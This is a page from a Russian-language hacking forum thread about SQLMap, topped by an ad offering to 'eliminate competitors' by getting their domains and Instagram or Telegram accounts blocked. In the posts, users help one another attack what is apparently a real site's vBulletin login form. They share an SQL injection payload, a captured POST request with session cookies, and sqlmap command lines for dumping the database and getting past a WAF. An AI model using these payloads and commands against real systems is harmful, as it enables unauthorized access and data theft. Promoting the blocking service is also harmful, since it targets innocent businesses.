УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 36 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#351

22.01.2017, 15:23

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от palec2006

↑
нет, не ваф, руками всё нормально лезет, только вывод вместе с 403 и скулмап не тянет

sqlmap похоже чекает нет ли там waf

Код:

./waf/webappsecure.py:15:    return code == 403

попробуй добавить --skip-waf

#352

22.01.2017, 16:42

DSW

Новичок

Регистрация: 21.08.2016

Сообщений: 26

Провел на форуме:
7140

Репутация: 0

[QUOTE="RWD"]
↑
вообщем уязвимость в файле /login.php
Attack details
URL encoded POST input
vb_login_username
was set to
-1' OR 3*2*1=6 AND 000491=000491 --
как такое заправить в sqlmap и получить бд?
POST /ajax/login.php HTTP/1.1
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http:site.com:80/
Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJ Or1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf ; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW

#353

22.01.2017, 16:49

grimnir

Познавший АНТИЧАТ

Регистрация: 23.04.2012

Сообщений: 1,109

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от sepo

↑
Скинь ссылку в ПМ, помогу

Код:

-u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db

#354

22.01.2017, 17:14

RWD

Участник форума

Регистрация: 25.04.2013

Сообщений: 153

Провел на форуме:
56255

Репутация: 2

Цитата:

Сообщение от grimnir

↑

Код:

-u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db

да в том то и дело что пробовал так, Acunetix говорит что дыра есть 100%

#355

22.01.2017, 17:20

DSW

Новичок

Регистрация: 21.08.2016

Сообщений: 26

Провел на форуме:
7140

Репутация: 0

Цитата:

Сообщение от RWD

↑
да в том то и дело что пробовал так, Acunetix говорит что дыра есть 100%

Попробуй сохронить cookie в файл ,допустим в sql.txt и после выполни

./sqlmap -r "путь до sql.txt" -p vb_login_username

#356

25.01.2017, 17:36

RWD

Участник форума

Регистрация: 25.04.2013

Сообщений: 153

Провел на форуме:
56255

Репутация: 2

вообщем есть скуль, time base blind

подбирает очень медленно, выдает ошибки, потом при таймауте 7 сек подбирает символ.

Но кроме как --current-user ничего не подбирает, кто сталкивался и как действовать?

#357

25.01.2017, 18:37

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от RWD

↑
вообщем есть скуль, time base blind
подбирает очень медленно, выдает ошибки, потом при таймауте 7 сек подбирает символ.
Но кроме как --current-user ничего не подбирает, кто сталкивался и как действовать?

так скуль скуле рознь, приучайтесь читать логи, опция -v 3 , скульмап обычно пишет где спотыкается, вероятно waf есть